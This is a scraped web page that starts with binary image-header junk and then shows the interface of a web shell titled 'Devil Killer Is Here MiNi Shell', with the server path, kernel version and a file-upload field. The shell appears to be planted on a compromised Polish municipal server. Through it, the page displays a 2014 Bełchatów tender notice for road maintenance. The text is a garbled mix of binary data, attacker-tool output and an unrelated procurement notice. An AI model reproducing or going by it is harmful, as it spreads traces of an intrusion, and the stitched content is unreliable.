JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/59420-N-2014.html

<p class="kh_header"><b>Bełchatów: Bieżące utrzymanie dróg, gruntów będących w zarządzie  i własnością  Miasta Bełchatowa</b><br>
<b>Numer ogłoszenia: 59420 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bełchatów reprezentowane przez Prezydenta Miasta Bełchatowa , ul. T. Kościuszki 1, 97-400 Bełchatów, woj. łódzkie, tel. 044 7335198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg, gruntów będących w zarządzie  i własnością  Miasta Bełchatowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie dróg, gruntów będących w zarządzie  i własnością  Miasta Bełchatowa
Wartość szacunkowa  zamówienia -1 300 813,01 PLN

roboty budowlane :
- roboty drogowe
- roboty w zakresie nawierzchni ulic

Przedmiotem zamówienia jest bieżące utrzymanie dróg, gruntów będących w zarządzie  i własnością  Miasta Bełchatowa.
Zakres przedmiotu zamówienia obejmuje wykonanie niżej wymienionych robót:
- mechaniczna naprawa nawierzchni dróg gruntowych (profilowanie, zagęszczanie, wykonywanie nawierzchni z kruszywa naturalnego);
- remonty i bieżące utrzymanie rowów przydrożnych (odmulanie, profilowanie skarp, wykonywanie nowych rowów);
- wykonywanie przepustów rurowych;
- wykonywanie nawierzchni żwirowo-glinkowych;
- naprawa poboczy gruntowych (profilowanie poboczy, zagęszczanie, wzmacnianie).
- remonty cząstkowe nawierzchni asfaltobetonowych;
- frezowanie nawierzchni bitumicznych;
- remonty kapitalne nawierzchni ulic;
- wymiana krawężników (realizowane w ramach remontów kapitalnych);
- regeneracja istniejących nawierzchni emulsją i grysami;
- naprawa nawierzchni bitumicznych metodą podciśnieniową;
- naprawy nawierzchni jezdni wykonanych z kostki betonowej;

Powyższe prace będą realizowane w ciągu dróg będących w zarządzie Miasta Bełchatowa, na długości około 150 km.

Szczegółowy opis przedmiotu zamówienia oraz wymagania zamawiającego dla realizacji zamówienia - zgodnie   z dokumentacją do przetargu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda  przedmiotowym postępowaniu wniesienia wadium.
Wykonawca biorący udział w przetargu zobowiązany jest wnieść wadium  w  wysokości  35 000,00 zł /słownie trzydzieści pięć tysięcy złotych 00 100   do  godziny  10:00   dnia 07.03.2014r. na rachunek zamawiającego: 82 1540 1245 2096 4804 1937 0006 Bank Ochrony Środowiska S.A.przelew lub złożyć inne formy wadium w kasie Urzędu Miasta  Bełchatowa przy ul. Kościuszki 1.
Wadium należy wnieść zgodnie z ustawą Prawo zamówień publicznych oraz w sposób i w terminie określonym w specyfikacji istotnych warunków zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy  prawa nakładają obowiązek ich posiadania.Na potwierdzenie spełniania warunku  wykonawca złoży oświadczenie   z art. 22 ust. 1 ustawy Prawo zamówień  publicznych.Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionego przez wykonawcę oświadczenia  metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie  spełniania warunku  wiedzy i doświadczenia wykonawca wykaże, iż  w okresie ostatnich  pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie 
 z zasadami sztuki budowlanej i prawidłowo ukończył minimum  dwie   główne roboty budowlane odpowiadające  rodzajowo robotom  budowlanym   stanowiącym  przedmiot zamówienia tj minimum jedną  robotę budowlaną obejmującą swym zakresem wykonanie remontów nawierzchni dróg gruntowych o wartości  brutto nie mniejszej niż  700 000,00 PLN i minimum jedną  robotę budowlaną obejmującą swym zakresem wykonanie remontów nawierzchni  bitumicznych o wartości  brutto nie mniejszej niż  700 000,00 PLN   lub jedną robotę budowlaną zawierającą w/w zakresy i wartości wraz z dokumentami potwierdzającymi ich wykonanie zgodnie z zasadami sztuki budowlanej  i prawidłowe ukończenie .
Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie  przedstawionego ych przez wykonawcę  dokumentu/ów,  metodą spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym  wykonania zamówienia wykonawca musi wykazać, iż  dysponuje:  
potencjałem technicznym, tj.
koparko-ładowarką o pojemności łyżki min. 0,4 m3 - min. 2 szt.
walcem samojezdnym typ ciężki - min. 2 szt.
walcem samojezdnym  typ lekki - min. 1 szt
ubijakiem spalinowym - min. 1 szt.
zagęszczarka o min. wadze  120 kg - min. 2 szt.
samochód ciężarowy -   samowyładowawczy o ładowności  min. 10 t - min. 3 szt.
równiarka - min. 1 szt.
frezarka do nawierzchni bitumicznych i betonowych - min. 1 szt.
samochód do przewozu mas asfaltobetonowych typu termos- min. 1 szt
recyklerem - min. 1 szt.
remonterem do napraw  nawierzchni metodą podciśnieniową  emulsją i grysami 
- min. 1 szt.
piłami spalinowymi do cięcia nawierzchni bitumicznych - min. 2 szt.
rozwiązaniami  logistycznymi umożliwiającymi przemieszczenie niezbędnego  sprzętu do napraw awaryjnych w ciągu 4 godz. od ich ujawnienia.
Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie przedstawionego nych przez wykonawcę dokumentu ów,  metodą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania  osobami zdolnymi do wykonania zamówienia wykonawca musi wykazać, iż  dysponuje  
osobami zdolnymi do wykonania zamówienia, tj
kierownikiem robót, posiadającym uprawnienia budowlane lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w specjalności  branża drogowa - do kierowania robotami budowlanymi związanymi 
z przedmiotem zamówienia. Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie przedstawionego nych przez wykonawcę dokumentu ów,  metodą spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej wykonawca przedstawi opłaconą polisę , a w przypadku jej braku inny dokument potwierdzający, iż wykonawca  jest ubezpieczony  od odpowiedzialności  cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia  o min. sumie  gwarancyjnej - 300 000,00 PLN   słownie  trzysta  tysięcy złotych 00 100.
Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie przedstawionego przez wykonawcę dokumentu   metodą spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Warunki udziału w postępowaniu.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące1.Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy  prawa nakładają obowiązek ich posiadania.
2.Posiadania wiedzy i doświadczenia.3.Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.4.Sytuacji ekonomicznej i finansowej.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.Ad.1.Zamawiający nie precyzuje warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy  prawa nakładają obowiązek ich posiadania.Na potwierdzenie spełniania warunku  wykonawca złoży oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień  publicznych.Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionego przez wykonawcę oświadczenia  metodą spełnia  nie spełnia.Ad.2.Na potwierdzenie  spełniania warunku  wiedzy i doświadczenia wykonawca wykaże, iż w okresie ostatnich  pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył minimum  dwie  główne roboty budowlane odpowiadające  rodzajowo robotom  budowlanym   stanowiącym  przedmiot zamówienia tj.-minimum jedną  robotę budowlaną obejmującą swym zakresem wykonanie remontów nawierzchni dróg gruntowych o wartości  /brutto/ nie mniejszej niż  700 000,00 PLN  i minimum jedną  robotę budowlaną obejmującą swym zakresem wykonanie remontów nawierzchni  bitumicznych o wartości  brutto nie mniejszej niż  700 000,00 PLN   lub  jedną robotę budowlaną zawierającą w/w zakresy i wartości wraz z dokumentami potwierdzającymi ich wykonanie zgodnie z zasadami sztuki budowlanej  i prawidłowe ukończenie .Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie  przedstawionego/ych przez wykonawcę  dokumentu ów, metodą spełnia nie spełnia. Ad. 3. Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia wykonawca musi wykazać, iż  dysponuje a.potencjałem technicznym, tj.
koparko-ładowarką o pojemności łyżki min. 0,4 m3 - min. 2 szt.
walcem samojezdnym typ ciężki  - min. 2 szt.walcem samojezdnym typ lekki - min. 1 szt ubijakiem spalinowym - min. 1 szt.zagęszczarka o min. wadze  120 kg - min. 2 szt.
samochód ciężarowy -   samowyładowawczy o ładowności  min. 10 t - min. 3 szt.
równiarka - min. 1 szt.frezarka do nawierzchni bitumicznych i betonowych - min. 1 szt.samochód do przewozu mas asfaltobetonowych typu termos - min. 1 szt
recyklerem - min. 1 szt.remonterem do napraw  nawierzchni metodą podciśnieniową  emulsją i grysami - min. 1 szt.piłami spalinowymi do cięcia nawierzchni bitumicznych - min. 2 szt.rozwiązaniami  logistycznymi umożliwiającymi przemieszczenie niezbędnego  sprzętu do napraw awaryjnych w ciągu 4 godz. od ich ujawnienia.
Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie przedstawionego nych przez wykonawcę dokumentu/ów,  metodą spełnia nie spełnia. 
b.osobami zdolnymi do wykonania zamówienia, tj.kierownikiem robót, posiadającym uprawnienia budowlane lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w specjalności  branża drogowa - do kierowania robotami budowlanymi związanymi z przedmiotem zamówienia, Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie przedstawionego /nych przez wykonawcę dokumentu/ów,  metodą spełnia / nie spełnia. Ad.4.Na potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, iż wykonawca  jest ubezpieczony  od odpowiedzialności  cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia  o min. sumie  gwarancyjnej - 300 000,00 PLN   słownie:  trzysta  tysięcy złotych 00/100.Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie przedstawionego przez wykonawcę dokumentu   metodą spełnia / nie spełnia. 
VI. Wykaz dokumentów jaki mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. A.W celu  oceny spełniania przez wykonawcę warunków, o których mowa w art.22 ust.1  ww ustawy  zamawiający żąda następujących dokumentów1.oświadczenie wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień  publicznych, art. 44  ww ustawy  - zgodnie z załączonym wzoremW przypadku wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden  z wykonawców.
2.wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W przypadku wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden  z wykonawców.
3. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami .
W przypadku wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden  z wykonawców.
4. oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.W przypadku wykonawców wspólnie ubiegających się o zamówienie dokument ten  składa przynajmniej jeden  z wykonawców.
5.wykaz narzędzi , wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją 
o podstawie  dysponowania  tymi zasobami.
 W przypadku wykonawców  wspólnie ubiegających się o zamówienie dokument ten  
składa przynajmniej jeden  z wykonawców.
6.opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że  wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej  z przedmiotem zamówienia.
W przypadku wykonawców  wspólnie ubiegających się o zamówienie dokument ten  
składa przynajmniej jeden  z wykonawców.
Wartości podane w dokumentach w walutach innych niż wskazane przez zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu.
B.W celu wykazania braku podstaw do  wykluczenia z postępowania o   udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art.24 ust.1 w w ustawy- zamawiający żąda następujących dokumentów
1.oświadczenie o braku podstaw do wykluczenia- zgodnie z załączonym wzorem
2.aktualnego odpisu z właściwego rejestru  lub centralnej ewidencji  i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji , w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert.
